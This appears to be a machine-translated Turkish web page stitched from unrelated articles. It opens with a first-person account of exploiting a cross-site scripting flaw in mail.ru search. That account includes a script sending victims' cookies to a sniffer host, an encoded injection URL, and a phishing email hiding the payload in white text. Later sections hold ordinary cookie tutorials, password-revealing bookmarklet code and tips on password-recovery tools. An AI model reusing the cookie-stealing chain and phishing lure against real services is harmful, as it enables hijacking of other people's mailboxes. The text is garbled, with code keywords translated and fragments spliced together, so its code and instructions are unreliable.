Çerezleri çalmanın kolay bir yolu. Çerezlerden şifre nasıl alınır Çerezlerden şifre nasıl alınır chrome

Bilgi güvenliği konularına adanmış ücretsiz bir etkinliğe katılmanın önerildiği yer. Etkinlik benim şehrimde yapıldığından kesinlikle oraya gitmem gerektiğine karar verdim. İlk ders XSS gibi web sitelerindeki güvenlik açıklarına ayrılmıştı. Dersten sonra edindiğim bilgileri gerçek koşullarda pekiştirmem gerektiğine karar verdim. Şehrimle ilgili birkaç site seçtim ve senaryomu tüm formlara eklemeye başladım. Çoğu durumda komut dosyası filtrelendi. Ama öyle oldu ki “uyarı” tetiklendi ve mesajım belirdi. Bulunan güvenlik açığını yöneticilere bildirdim ve onlar hızla her şeyi düzelttiler.

Bu günlerden birinde mail.ru'daki en son postaları kontrol ederken, posta kutusundaki harfleri aramak için bir form gözüme çarptı. Bazen eski mektuplarım arasında ihtiyacım olan bir şeyi bulmak için bu aramayı kullanırdım. Son birkaç gündür “alert”imi neredeyse bulabildiğim her yere koyduğum için elim refleks olarak bu arama formuna uzandı. Senaryomun kodunu yazıp Enter'a bastım. Ekranda acı verici derecede tanıdık bir mesaj gördüğümde yaşadığım şaşkınlığı hayal edin...

Açık Bilgi Güvenliği Günleri dersinde konuşmacı, programcıların bu tür güvenlik açıkları konusunda oldukça şüpheci olduklarını belirterek, "uyarı mı? Peki ne olmuş? Bu tehlikeli değil". Diğer sitelerde mesajımla yalnızca bu pencereden memnun olsaydım, bu durumda daha ileri gitmeye ve böyle bir "uyarıdan" neler çıkabileceğini göstermeye karar verdim.

Yani script çalışıyor, bu da bir güvenlik açığı olduğu anlamına geliyor. Bu nedenle başka bir komut dosyası çalıştırmayı deneyebilirsiniz. Örneğin başka bir kullanıcının çerezlerini bize gönderen bir komut dosyası. Komut dosyasının çalışması için kullanıcıyı komut dosyamızı çalıştırmaya zorlamamız gerekir. Bu, ona uygun bağlantıya sahip bir mektup gönderilerek, posta kutusunun aranacağı ve ihtiyacımız olan kodun yürütüleceği tıklatılarak yapılabilir.

Güvenlik açığının mekaniğini anlamak biraz zaman aldı ve çok fazla deney yaptı. Bazen senaryo işe yaradı, bazen filtrelendi. Biraz çaba sarf ettikten sonra, komut dosyasının yalnızca harf araması olumlu sonuç verdiğinde% 100 çalıştığı ampirik olarak belirlendi. Yani bir kullanıcı scriptimiz ile arama yaptığında belirtilen parametrelere göre mail kutusunda en az bir harfin bulunması gerekmektedir. Bunu ayarlamak zor değil.

Ayrıca bir “uyarı” yerine çerezleri algılayıcımıza aktaracak bir komut dosyasına ihtiyacımız var. Bu scripti ayrı bir dosyaya yazıp aramamıza yükleyeceğiz. Gerekli kodla bir test.js dosyası oluşturup hostinge yükledim. Komut dosyası kodu şu şekildedir:

Img=yeni Resim();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
fonksiyon F() (
konum = "http://www.solife.ru";
}
setTimeout(F, 5000);

Burada neyi açıklığa kavuşturmak istiyorum. Kendimizi saldırganın yerine koyalım. Kullanıcının bağlantıya tıklamasına ihtiyacımız var. Onu bunu yapmaya nasıl zorlayabilirim? Dağlarca altın vaat edebilirsiniz ve bunları almak için siteye olan bağlantımızı takip etmeniz gerekir. Ama işe yarayacağını sanmıyorum. İnsanlar artık buna kanmıyor (Ben de bu tür mektupları okumadan sürekli siliyorum). Bu nedenle doğada hala var olduğu için insana acımayla oynayacağız. Nesli tükenmekte olan hayvanları kurtarmak için siteye oy vermenizi rica ediyoruz. Öncelikle çerezleri alacağız ve ardından kullanıcıyı oylama sitesine yönlendireceğiz. Yeniden yönlendirme için zaman aşımı 5 saniyeye ayarlandı, aksi takdirde çerezlerin algılayıcıya aktarılacak zamanı yoktu ve kullanıcı hemen hayvanlarla ilgili bir siteye yönlendirildi. Bir “uyarı” yerine aşağıdaki betiği kullandım:

Senaryoları bitirdiğimde mektubu yazmaya başladım. Şöyle bir şey buldum:


Oldukça alaycı bir şekilde ortaya çıktı, ancak koşulları olabildiğince gerçeğe yaklaştırmaya çalıştım. Mektubun sonunda yazılı bir satır var, bu sayede arama yaptığımızda mektubumuz bulunabilecek. Çizgi gereksiz soruları gündeme getirmesin diye onu beyaza boyadım. Ayrıca stringin tanınıp linke dönüşmemesi için “http” kelimesine de boşluk koydum. Aksi takdirde, script satırı beyaz yazı tipiyle yazılmasına rağmen, bağlantı alıcı tarafından mavi renkle vurgulanacaktır ve buna ihtiyacımız yoktur. Akıllı arama, boşluklara rağmen bu dizeyi yine de bulacak ve tanıyacaktır.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Hiçbir şeyin filtrelenmemesi için komut dosyası için URL kodlamasını kullandım. Aramanın “Gelen Kutusu” klasöründe gerçekleşmesi için arama için “q_folder=0” parametresini de ekledim.

Mektup hazır, gönderiyoruz. İkinci posta kutumu alıcıyla aynı hizmette kullandım. Bakalım diğer kutuya ne gelmiş.

Senaryo metnimiz arka plana karıştığı için görünmüyor. Linke tıklayıp neler olacağını görelim. Kullanıcı belirttiğimiz parametreye göre e-postalara ilişkin arama sonuçlarına taşınır. Gönderdiğimiz mektubumuz arama sonuçlarında görünüyor. Şu anda betiğimiz zaten çalıştı ve kullanıcının çerezlerini algılayıcıya gönderdi. 5 saniye sonra (süre komut dosyası ayarlarına bağlıdır), kullanıcı oylama sitesine yönlendirilir.

sniff.txt dosyamı kontrol ediyorum:

Amacım başkalarının kutularını çalmak ya da onlara erişim sağlamak olmadığından hikayeyi burada sonlandıracağım. Ancak teorik olarak çerezlerinizi başka birinin çerezleriyle değiştirebilir ve başka birinin posta kutusuna erişim sağlayabilirsiniz. Genel olarak, eğer bir saldırgan hedefle ilgileniyorsa, aldığı bilgiden bir kullanım alanı bulacaktır.

Sergei Belov'a teşekkür etmek istiyorum (

JavaScript, tarayıcıda çerezlerin ayarlanmasını ve okunmasını mümkün kılar. Bu derste çerezlerle nasıl çalışılacağına bakacağız ve ayrıca girilen adı hatırlayacak ve her giriş yaptığınızda görüntüleyecek basit bir sayfa oluşturacağız.

Çerezler nedir?

Çerezler, bir web tarayıcısı tarafından saklanan az miktarda veridir. Kullanıcı hakkındaki belirli bilgileri saklamanıza ve sayfanızı her ziyaret ettiğinde bu bilgileri almanıza olanak tanır. Her kullanıcının kendine özel çerez seti vardır.

Çerezler genellikle web sunucusu tarafından site ziyaretlerini takip etmek, siteye kaydolmak ve siparişler veya satın almalarla ilgili bilgileri depolamak gibi işlevleri gerçekleştirmek için kullanılır. Ancak çerezleri kullanmak için bir web sunucusu programı icat etmemize gerek yoktur. Bunları JavaScript kullanarak kullanabiliriz.

document.cookie özelliği.

JavaScript'te çerezlere, belge nesnesinin çerez özelliği kullanılarak erişilir. Çerezleri aşağıdaki şekilde oluşturabilirsiniz:

Ve kaydedilen tüm çerez setini şu şekilde alın:

Var x = belge.çerez;

Çerezleri kaydetme ve alma konusuna daha ayrıntılı olarak bakalım.

Çerezleri kaydetme

Bir çerezi kaydetmek için, oluşturmak istediğimiz çerezin özelliklerini içeren bir metin dizesine document.cookie'yi atamamız gerekir:

document.cookie = " ad = değer; sona erme = tarih; yol = yol; etki alanı = etki alanı; güvenli";

Özellikler tabloda açıklanmıştır:

Özellik Açıklama Örneği

isim = değer	Çerez adını ve değerini ayarlar.	kullanıcı adı=Vasya
sona erme tarihi = tarih	Çerezlerin son kullanma tarihini ayarlar. Tarih, Date nesnesinin toGMTString() yöntemi tarafından döndürülen biçimde olmalıdır. Süre sonu belirtilmezse tarayıcı kapatıldığında çerez silinecektir.	süresi doluyor= 13/06/2003 00:00:00
yol = yol	Bu seçenek sitede çerezin geçerli olduğu yolu belirler. Yalnızca belirtilen yoldan gelen belgeler çerez değerini alabilir. Genellikle bu özellik boş bırakılır; bu, yalnızca çerezi ayarlayan belgenin ona erişebileceği anlamına gelir.	yol=/demo/
etki alanı=etki alanı	Bu seçenek, çerezin içinde çalışacağı etki alanını belirler. Yalnızca belirtilen etki alanındaki siteler çerez değerini alabilir. Genellikle bu özellik boş bırakılır; bu, yalnızca çerezi ayarlayan etki alanının ona erişebileceği anlamına gelir.	etki alanı=web sitesi
güvenli	Bu seçenek, tarayıcıya çerezleri sunucuya göndermek için SSL kullanmasını söyler. Çok nadiren kullanılır.	güvenli

Çerezlerin ayarlanmasına ilişkin bir örnek görelim:

document.cookie = "kullanıcı adı=Vasya; süresi doluyor=02/15/2011 00:00:00";

Bu kod, kullanıcı adı çerezini ayarlar ve ona 15 Şubat 2011 tarihine kadar saklanacak olan "Vasya" değerini atar (Avrupa saat formatı kullanılır!).

var cookie_date = new Date(2003, 01, 15); document.cookie = "kullanıcı adı=Vasya; sona erer =" + cookie_date.toGMTString();

Bu kod önceki örnekle tamamen aynı şeyi yapar ancak tarihi ayarlamak için Date.toGMTString() yöntemini kullanır. Date nesnesindeki ay numaralandırmasının 0'dan başladığını, yani Şubat ayının 01 olduğunu lütfen unutmayın.

Document.cookie = "logged_in=yes";

Bu kod,logging_in çerezini ayarlar ve onu "evet" olarak ayarlar. Expirates özelliği ayarlanmadığından tarayıcı kapatıldığında çerez silinecektir.

var cookie_date = yeni Tarih(); // Geçerli tarih ve saat cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = "logged_in=; sona erer =" + cookie_date.toGMTString();

Bu kod, logging_in çerezini ayarlar ve depolama dizesini geçerli saatten bir saniye önceki zamana ayarlar - bu işlem çerezi hemen siler. Çerezleri silmenin manuel yolu!

Çerez değeri yeniden kodlanıyor!

Boşluk ve iki nokta üst üste gibi karakterlerin doğru şekilde saklanması ve görüntülenmesi için çerez değerinin yeniden kodlanması gerekir. Bu işlem tarayıcının değeri doğru yorumlamasını sağlar. Lego kaydı, JavaScript'in kaçış() işlevi tarafından gerçekleştirilir. Örneğin:

document.cookie = "kullanıcı adı=" + kaçış("Vasya Pupkin") + "; süresi doluyor=02/15/2003 00:00:00"; Çerezleri ayarlama işlevi

Değerleri yeniden kodlamak ve document.cookie dizisini oluşturmak gibi basit işlemleri gerçekleştirecek özel bir fonksiyon yazarsak çerezleri ayarlamak daha kolay olacaktır. Örneğin:

İşlev set_cookie (ad, değer, exp_y, exp_m, exp_d, yol, etki alanı, güvenli) ( var cookie_string = name + "=" + kaçış (değer); if (exp_y) ( var exp_y, exp_m, exp_d, path, domain, secure) ); cookie_string += "; Expires = " + Expires.toGMTString(); ) if (path) cookie_string += "; path = " + kaçış (yol); if (etki alanı) cookie_string += "; etki alanı = " + kaçış (etki alanı); if (secure) cookie_string += "; secure"; document.cookie = cookie_string; )

İşlev, çerez verilerini argüman olarak alır, ardından uygun dizeyi oluşturur ve çerezi ayarlar.

Örneğin, son kullanma tarihi olmayan çerezlerin ayarlanması:

set_cookie("kullanıcı adı", "Vasya Pupkin"); set_cookie ("kullanıcı adı", "Vasya Pupkin", 2011, 01, 15);

Saklama süresi, site alanı, SSL kullanarak ancak yol olmadan çerezlerin ayarlanması:

set_cookie ("kullanıcı adı", "Vasya Pupkin", 2003, 01, 15, "", "site", "güvenli"); Çerezleri silme işlevi.

Çerezlerle çalışmaya yönelik bir başka yararlı işlev aşağıda sunulmuştur. İşlev, son kullanma tarihini geçerli zaman değerinden bir saniye öncesine ayarlayarak çerezleri tarayıcıdan "siler".

function delete_cookie (cookie_name) ( var cookie_date = new Date (); // Güncel tarih ve saat cookie_date.setTime (cookie_date.getTime() - 1); document.cookie = cookie_name += "=; Expires=" + cookie_date.toGMString (); )

Bu işlevi kullanmak için yalnızca silinecek çerezin adını iletmeniz yeterlidir:

Sil_cookie("kullanıcı adı");

Çerez değerini alma

Geçerli belge için önceden ayarlanmış bir çerezin değerini elde etmek amacıyla document.cookie özelliğini kullanmanız gerekir:

Var x = belge.çerez;

Bu, noktalı virgülle ayrılmış ad/değer çiftlerinin listesinden oluşan bir dize döndürür. herkes Geçerli belge için geçerli olan çerezler. Örneğin:

"kullanıcı adı=Vasya; şifre=abc123"

Bu örnekte önceden ayarlanmış 2 çerez bulunmaktadır: “Vasya” değerine sahip kullanıcı adı ve “abc123” değerine sahip şifre.

Çerez değerini alma işlevi

Genellikle aynı anda yalnızca bir çerezin değerine ihtiyacımız olur. Bu nedenle çerez dizisinin kullanımı uygun değildir! Burada document.cookies dizesini işleyen ve yalnızca belirli bir anda ilgilenilen çerezleri döndüren bir işlev bulunmaktadır:

Function get_cookie (cookie_name) ( var results = document.cookie.match ("(^|;) ?" + cookie_name + "=([^;]*)(;|$)"); if (results) return (unescape) (sonuçlar)); aksi halde null değerini döndürür; )

Bu işlev, ilgilenilen çerezin adını bulmak için normal bir ifade kullanır ve ardından onu normal karakter biçimine yeniden kodlamak için unescape() işlevi tarafından işlenen değeri döndürür. (Çerez bulunamazsa null değeri döndürülür.)

Bu özelliğin kullanımı kolaydır. Örneğin, kullanıcı adı çerez değerini döndürmek için:

Var x = get_cookie("kullanıcı adı");

Basit kullanım örneği

Bu örnekte, ilk ziyaretinizde adınızı soran, ardından adınızı bir çereze kaydedip sonraki ziyaretlerinizde görüntüleyen bir sayfa hazırladık.

Sayfayı yeni bir pencerede açın. İlk ziyaretinizde adınızı girmenizi ve bir çereze kaydetmenizi isteyecektir. Sayfayı tekrar ziyaret ettiğinizde girdiğiniz çerez adı ekranda görüntülenecektir.

Çerezler için saklama süresini geçerli tarihten itibaren 1 yıl olarak ayarladık, bu, tarayıcıyı kapatsanız bile adınızı kaydedeceği anlamına gelir.

Kaynağı Görüntüle seçeneğini seçerek sayfa kodunu tarayıcınızda görüntüleyebilirsiniz. İşte kodun ana kısmı:

if (! get_cookie ("kullanıcı adı")) ( var kullanıcı adı = istem ("Lütfen adınızı girin", ""); if (kullanıcı adı) ( var current_date = yeni Tarih; var cookie_year = current_date.getFullYear () + 1; var cookie_month = current_date.getMonth(); var cookie_day = current_date.getDate(); set_cookie("kullanıcı adı", kullanıcı adı, cookie_year, cookie_month, cookie_day); ) ) else ( var kullanıcı adı = get_cookie("kullanıcı adı"); document.write ( "Merhaba, " + kullanıcı adı + ", sayfaya hoş geldiniz!"); document.write("
Beni unut!"); }

Bu ders, ziyaretçileriniz hakkında bilgi depolamak için JavaScript'te çerezlerin nasıl kullanılacağını gösterdi. İlginiz için teşekkür ederiz! :)

Muhtemelen çerezlerin ne olduğu ve ne için gerekli olduklarıyla başlamaya değer. Çerez, kullanıcının tarafında saklanabilen ve daha sonra fikirlerini hayata geçirmek için kullanılabilen bir veri parçasıdır.

Web sitenizde sitenin renk düzenini seçme olanağına sahip olduğunuzu hayal edelim. Seçtiği temayı yalnızca kendisi görebileceği için bunu çerezlere uygulamak çok uygundur.

Çerezler hem PHP'de hem de jQuery'de mevcuttur. Bu nedenle her durumu daha ayrıntılı olarak ele alacağız.

jQuery'de Çerezlerle çalışmaya ilişkin ayrıntılı talimatlar

1. Çerezleri Ayarlama

Artık ilk çerezimizi oluşturmayı deneyebiliriz:

$.cookie("çerez_adı", "çerez_değeri", (süresi doluyor: 3, yol: "/", etki alanı: "siteniz.ru", güvenli: doğru ));

Burada ne var?

“çerez_adı” – çerez adı;

“cookie_value” – çerez değeri;

"süresi doluyor" - çerezlerin saklanacağı gün sayısı (bizim durumumuzda - 3 gün). Bu sürenin sonunda çerezler otomatik olarak silinecektir;

“yol” – sitedeki çerezlerin varlığı (bizim durumumuzda “/” - sitenin tamamında mevcuttur). Dilerseniz çerezlerin bulunacağı yalnızca belirli bir sayfa veya bölümü belirtebilirsiniz, örneğin “/audio/rock”;

“etki alanı” – çerezin geçerli olduğu alan adı. Bir alt alan adınız varsa, bunu bu parametrede belirtebilirsiniz, örneğin, “domain: “subdomain.your_site.ru” ve bu durumda çerez yalnızca “subdomain.your_site.ru” alan adında mevcut olacaktır;

"güvenli" – çerezin güvenli https protokolü üzerinden iletilmesi gerektiğini belirten bir parametre.

Burada tüm parametreler gerekli değildir ve çerezleri ayarlamak için bu yapı yeterli olacaktır:

$.cookie("çerez_adı", "çerez_değeri", (süresi doluyor: 3, yol: "/" ));

2. Çerez Alma

Çerezleri almak oldukça basittir; bunu kodu kullanarak yapabilirsiniz:

$.cookie("cookie_name");

Bu kod bir değişkene atanabilir ve ihtiyaçlarınız için kullanılabilir:

var içerik = $.cookie("cookie_name"); if(content != null) ( warning("Çerez mevcut!"); ) else ( warning("Çerez mevcut değil!"); )

Katılıyorum, bu çok uygun.

3. Çerezleri Kaldırma

Bir çerez değerini kaldırmak için onu "null" olarak ayarlayın:

$.cookie("çerez_adı", null);

Sanırım bu, jQuery'de Çerezlerle çalışmaya girişin sonu. Bu bilgi fikirlerinizi uygulamak için oldukça yeterlidir.

PHP'de Çerezlerle çalışmaya ilişkin ayrıntılı talimatlar

Çerezlerle çalışmaya yönelik önceki seçeneğin aksine, buraya hiçbir şey bağlamanıza gerek yoktur.

1. Çerezleri Ayarlama

PHP'de çerezleri ayarlamak için yerleşik “setcookie” fonksiyonunu kullanacağız:

Burada ne var?

“çerez_adı” – çerez adı;

“cookie_value” – çerez değeri;

“time()+3600” – saniye cinsinden çerez ömrü (bizim durumumuzda – 1 saat). Kullanım ömrünü “0” olarak ayarlarsanız, tarayıcı kapatıldığında çerez silinecektir;

“/” – çerezlerin mevcut olduğu bölüm (bizim durumumuzda, site genelinde mevcuttur). Çerezlerin bulunacağı bölümü sınırlamak istiyorsanız “/” yerine örneğin “/audio/rock” yazın;

“your_site.ru” – çerezin mevcut olacağı alan adı;

“doğru” – çerezin yalnızca güvenli https protokolü aracılığıyla kullanılabildiğini belirten bir parametre. Aksi halde değer false olur;

“yanlış” – çerezin kodlama dilleri için mevcut olduğunu gösteren bir parametre. Aksi halde – doğru (yalnızca http aracılığıyla kullanılabilir).

Burada da tüm parametreler gerekli değildir ve çerez oluşturmak için yalnızca aşağıdaki yapıya ihtiyacınız olacaktır:

Kolaylık sağlamak için çerez değeri bir değişken aracılığıyla ayarlanabilir:

2. Çerez Alma

Çerezleri almak için şunları kullanmanız gerekir:

$_COOKIE["çerez_adı"];

Olası eksik çerezlerden kaynaklanan hataları ortadan kaldırmak için şunları kullanın:

jQuery'de Çerezlerle çalışmaya ilişkin önceki örnekte olduğu gibi, çerezler bir değişkene atanabilir:

3. Çerezleri Kaldırma

PHP'de çerezleri kaldırmak jQuery'deki kadar kolaydır. Tek yapmanız gereken, çerezi boş bir değere ve negatif bir zamana (zaten geçmiş olan süreye) ayarlamaktır:

Setcookie("çerez_adı", "", zaman() - 3600);

Bu örnekteki zaman bir saat öncesine aittir ve bu, çerezlerin silinmesi için oldukça yeterlidir.

Bazı durumlarda, gerekli işlevselliği uygulamak için çerez kullanmanın bir veritabanı kullanmaktan çok daha mantıklı olduğunu belirtmek isterim.

Çerezler kullanıcı için yalnızca sürekli ziyaret edilen sayfaların daha hızlı yüklenmesi için gerekli değildir. Uzak sunucular bu veya diğer bilgileri otomatik olarak kullanıcının bilgisayarına kaydeder, böylece gelecekte veri alışverişi ile çalışmak rahat olacaktır.

Talimatlar

1. Kaynaklarda kullanıcının kullanıcı adını ve şifresini bulmak için dosyaları kullanabilirsiniz. Mozilla Firefox tarayıcısını kullanıyorsanız ve çerezleri kaydetme seçeneği etkinse, kaydedilen kullanıcı adlarını ve şifreleri doğrudan programda bulabilirsiniz. Bunu yapmak için tarayıcı menüsünde sayfanın üst kısmındaki "Araçlar" adlı öğeye tıklayın. Sistem ayarını seçin. Önünüzde birkaç sekme içeren büyük bir pencere görünecektir. "Güvenlik" sekmesine gidin.

2. Açılan pencerede "Kayıtlı Şifreler" etiketli düğmeye tıklayın. Önünüzde farklı kaynaklara kaydettiğiniz oturum açma bilgilerinin listesini içeren yeni bir pencere açılacaktır. “Şifreleri Görüntüle” butonuna tıklayın. Aynı menüde şifre belirlemeyi seçerek de bu bilgileri koruyabilirsiniz.

3. Opera tarayıcısını kullanıyorsanız yalnızca kullanıcı adlarını bulabileceksiniz. Bunu yapmak için araçlardaki şifre yöneticisini açın ve mevcut oturum açma bilgilerine bakın. Kaydedilen şifreyi bulmak için Opera Şifre Kurtarma gibi ek yazılım yükleyin. Aynı zamanda, hiçbir üçüncü taraf yazılımın kişisel verilerinizin tam güvenliğini garanti etmediğini unutmayın; bu nedenle şifrelerinizi bağımsız olarak hatırlayın veya farklı bir tarayıcı kullanın.

4. Şifrenizi Google Chrome'da görüntülemek istiyor musunuz? Daha sonra araç çubuğundaki ilgili öğeye tıklayarak parametrelerdeki ayarları açın. "Gelişmiş" bölümüne gidin ve "Çerezleri göster" seçeneğine tıklayın.

5. Standart Internet Explorer tarayıcısının kullanıcısıysanız, şifreyi çıkarmak için basit BehindTheAsterisks yardımcı programını kullanın. Sezgisel bir arayüze sahip olan ve kullanıcıya şifreyi yıldız işaretleri yerine simgelerle görüntüleme seçeneği sunan ücretsiz bir programdır. Bu yardımcı program diğer tarayıcılarda da mevcuttur.

Birçok modern tarayıcı, farklı sitelerin şifrelerini hatırlama gibi bir özelliğe sahiptir. Şifrenizi bir kez girerek siteye her girişinizde satır doldurma zorunluluğundan kurtulursunuz. Peki şifrenizi unuttuysanız ve şifreniz web sitesinde noktaların arkasında gizlenmişse ne yapmalısınız? Şifreyi bulmak için diğer talimatları izlemelisiniz.

Talimatlar

1. Öncelikle şifreye ihtiyaç duyduğunuz siteye gitmeniz gerekiyor. "Şifre Değneği"ne tıklayın. Tüm alanlar yıldız işaretleri veya noktalarla doldurulduktan sonra hemen ESC tuşuna basın. Bundan sonra adres çubuğuna şu kodu girin: javascript:(function () ( inp = document.getElementsByTagName('input'); for (var j = 0; j< inp.length; j++) { if (inp[j].type == ‘password’) { prompt(inp[j].name, inp[j].value); } } }) ()Нажав на ENTER, вы получите нужный пароль.

2. 1. yöntem işe yaramazsa Opera şifre kurtarma yardımcı programını kullanabilirsiniz. Bu, Opera tarayıcısında kayıtlı şifreleri düzeltmek için tasarlanmış bir programdır. Bu program çok basit ve kullanımı kolaydır; sadece onu başlatmanız ve ardından “Şifreleri Doğrula” seçeneğine tıklamanız yeterlidir. Tespit edilen tüm şifreler metin dosyalarına veya HTML raporlarına kaydedilecektir.

Tüm modern tarayıcıların, çerezler de dahil olmak üzere geçici dosyaları temizleme seçeneği vardır. Ancak bazen tamamen silmek gerekli değildir; tarayıcı tarafından saklanan çerezleri seçici olarak görüntülemek, düzenlemek ve silmek gerekir. Aşağıda, özellikle ünlü tarayıcılarda bu seçeneğe erişimin bir özeti bulunmaktadır.

Talimatlar

1. Opera tarayıcısında, depoladığı her bir çereze erişmek için, “Ana Menü”deki “Ayarlar” bölümüne gitmeniz ve orada “Genel Ayarlar...” öğesini seçmeniz (veya CTRL + tuş kombinasyonuna basmanız) gerekir. F12). Sonuç olarak, "Gelişmiş" sekmesine gitmeniz, sol paneldeki "Çerezler" bölümünü seçmeniz ve "Çerezleri Yönet" düğmesini tıklamanız gereken tarayıcı ayarları penceresi açılacaktır.

2. Opera'nın çerez yönetimi penceresinde ihtiyacınız olanı bulabilir, onu seçebilir ve girişin içeriğini görmek için "Düzenle" düğmesini tıklayabilirsiniz. Dilerseniz çerezi düzenleyebilirsiniz.

3. Mozilla FireFox'ta çerezlere ulaşmak için menüdeki “Araçlar” bölümünü seçip içindeki “Ayarlar”a tıklamanız gerekmektedir. Ayarlar penceresinde “Gizlilik” sekmesine gidin ve “Çerezleri Göster...” yazan butona tıklayın. Sonuç olarak, kayıtlı çerezlerin listesini içeren ve içeriklerini arayabileceğiniz ve görüntüleyebileceğiniz bir pencere açılacaktır.

4. Internet Explorer'da çerez depolamaya giden yol, “Araçlar” adı verilen menü bölümü ve içindeki “İnternet Seçenekleri” öğesinden geçer. Bu öğeye tıklamak, "Genel" sekmesinde "Gözatma Geçmişi" bölümünde bulunan "Seçenekler" düğmelerinden birine tıklamanız gereken bir pencere açar. Bundan sonra, “Dosyaları Göster” butonuna tıklamanız gereken “Geçici Dosya Seçenekleri” başlıklı aşağıdaki pencere açılacaktır.

5. Internet Explorer'da bu yöntemi kullanarak tüm geçici dosyaların depolandığı klasöre yönlendirileceksiniz. "Ad" sütun başlığına tıklarsanız dosyalar ada göre sıralanacak ve tüm çerezler tek bir blokta gruplandırılacaktır. İhtiyacınız olanı bulabilir ve normal bir metin düzenleyicide görüntülemek ve düzenlemek için açabilirsiniz.

6. Google Chrome tarayıcısı, çerezlere erişim sağlamak için en uzun işlem dizisine sahiptir. Öncelikle pencerenin sağ üst köşesindeki İngiliz anahtarı simgesine tıklayıp menüden “Seçenekler” seçeneğini seçmelisiniz. Bu, sol bölmede Gelişmiş bağlantısını tıklamanız gereken Ayarlar sayfasını açacaktır. Gelişmiş ayarlar sayfasında, yeni bir pencere açmak için “İçindekiler Ayarları” düğmesine tıklayın.

7. Yeni pencerede “Tüm çerezler ve site verileri” butonuna tıklamanız gerekmektedir. Tarayıcı tarafından saklanan çerezlere geçişte nihai varış noktası burası olacaktır.

8. Google Chrome'da çerezleri görüntüleyebilir ve silebilirsiniz.

9. Safari tarayıcısında çerezlere erişmek için sağ üst köşedeki dişli simgesine de tıklamanız gerekir. Menüde, yeni bir pencere açacak olan “Ayarlar…” seçeneğini seçin. İçinde "Güvenlik" sekmesine gitmeniz ve "Çerezleri Göster" düğmesini tıklamanız gerekir. Safari'de yalnızca çerezleri arama ve silme seçeneğiniz vardır.

Konuyla ilgili video

Modern tarayıcı programları bizim için her şeyi hatırlar: favori sayfalarımız, uzun süredir ziyaret ettiğimiz her şey, her türlü sitenin şifreleri - posta, oyunlar, genel ağlar. Siteye gitmek ve artık kullanıcı adınızı ve şifrenizi girmeyi düşünmemek ne kadar rahat! Ancak bazen sistemi yeniden kurmanız ve tüm şifreleri program belleğinden kendinize geri döndürmeniz gerekir.

İhtiyacın olacak

• – İnternet erişimi olan bilgisayar
• - tarayıcı

Talimatlar

1. Mozilla Firefox programını başlatın ve bu tarayıcıda kayıtlı şifreyi kurtarmak için “Araçlar” komutunu çalıştırın. “Ayarlar” menü öğesini seçin, “Güvenlik” sekmesine gidin, “Kayıtlı Şifreler” düğmesini tıklayın. Bu pencerede tarayıcıda kayıtlı tüm şifreleri görüntüleyin, ihtiyacınız olanı seçin ve "göster" e tıklayın.

2. Opera programında kayıtlı şifreleri göstermenize izin verecek bir program indirin - UnWand - Opera'da şifreleri (Değnek - Değnek) görüntülemenin yanı sıra Opera şifre kurtarma programı 3.5.1.225 Bunu tespit etmek zor olmayacak . Programı bilgisayarınıza yükleyin, programı çalıştırın. Gerekli şifre düzeltme seçeneğini seçin: mekanik olarak çubuktan, mekanik olarak postadan, manuel olarak çubuktan, manuel olarak postadan, karışık seçenek. "İleri" düğmesini tıklayın. Bir tarama penceresi görünecektir, bir sonraki pencerede Opera programının konumunu belirtmeniz ve ileri'ye tıklamanız gerekir. Program bu klasörü tarayacak ve kayıtlı şifreleri gösterecektir.

3. Yalnızca Opera veya Mozilla'da değil, diğer birçok tarayıcıda da tarayıcıdaki şifreleri gösterebilen bir program indirin - Çoklu Şifre Kurtarma. İndirmek için programın resmi web sitesine gidin - http://passrecovery.com/ru/index.php. Bu programı bilgisayarınıza indirip yükleyin. Kurulum sırasında program sizden güncellemeyi kontrol etmenizi isteyecek, “Tamam”a tıklayın. Programı ana menüden başlatın. Sol tarafta, şifrenizi kurtarmak için gerekli programı seçmeniz gereken bir menü görüntülenecektir. Örneğin, Internet Explorer tarayıcısını listeden seçtiğinizde, bu tarayıcıya kaydedilen şifreler program penceresinin sağ tarafında gösterilecektir.

4. Başka bir program kullanarak tarayıcınızdan şifrenizi kurtarmak için http://www.nirsoft.net/ web sitesine gidin, oradan herhangi bir programı seçin ve indirin. İşlevleri, açıklanan önceki programlara benzer.

Neredeyse her zaman, şifreleri girerken gizliliği korumak için, ilgili programlar girilen karakterler yerine okunamayan karakterleri (yıldız işaretleri) görüntüler. Ancak şifre giriş alanında aynı yıldız işaretlerini görüyorsanız bu, şifrenin gerçekten bu alana yerleştirildiği anlamına gelmez. Çoğu zaman, bu tür yıldız işaretleri hiçbir şeyi gizlemez, ancak tamamen bilgilendirme işlevine sahiptir - şifreyi girdiğinizde meraklı gözlerden gizleneceğini fark etmenizi sağlar.

Talimatlar

1. Sunucudan alınan web sayfalarındaki yıldız işaretlerini çözme niyetinden vazgeçin. Çoğu durumda şifreler sunucu tarafından kullanıcının tarayıcısına iletilmez. Bunu, web tarayıcınız tarafından alınan ilk sayfa kodunu açarak doğrulayabilirsiniz; bu, şifreyi açık veya şifreli biçimde içermez. Şifreler İnternet üzerinden tarayıcıdan sunucuya yalnızca tek bir yönde iletilir.

2. Diğer programların açık pencerelerindeki şifreleri okuyabilen bazı özel uygulama programları kullanın. İşletim sisteminin hizmet bileşenlerinin parçası olarak böyle bir araç yoktur. Bir şifre çözme programının şifre güvenlik programlarıyla birlikte paketlenmesi olağandışı bir durumdur. Gerekli programı internette bulmak kolaydır; örneğin Pass Checker olabilir. Program toplam ağırlığı 296 kilobayt olan altı dosyadan (yardım dosyası dahil) oluşur ve kurulum gerektirmez. Dosyaları bir sabit diske veya çıkarılabilir ortama kaydettikten hemen sonra, Password.exe dosyasına çift tıklayarak başlatabilirsiniz.

3. Yıldızlarını önemsediğiniz programı açın. Bundan sonra, Pass Checker penceresini açık programın üzerine yerleştirin ve sol fare tuşuyla kafatasının görüntüsünü yıldız işaretleriyle gizlenmiş şifre ile alana sürükleyin. Bu alan yanıp sönen bir çerçeveyle vurgulanacak ve Şifre Çözücü penceresinde, pencere metninin karşısına şifre çözücü şifreyi şifrelenmemiş biçimde yerleştirecektir. Bu şifreyi istediğiniz şekilde kopyalayıp kullanabilirsiniz.

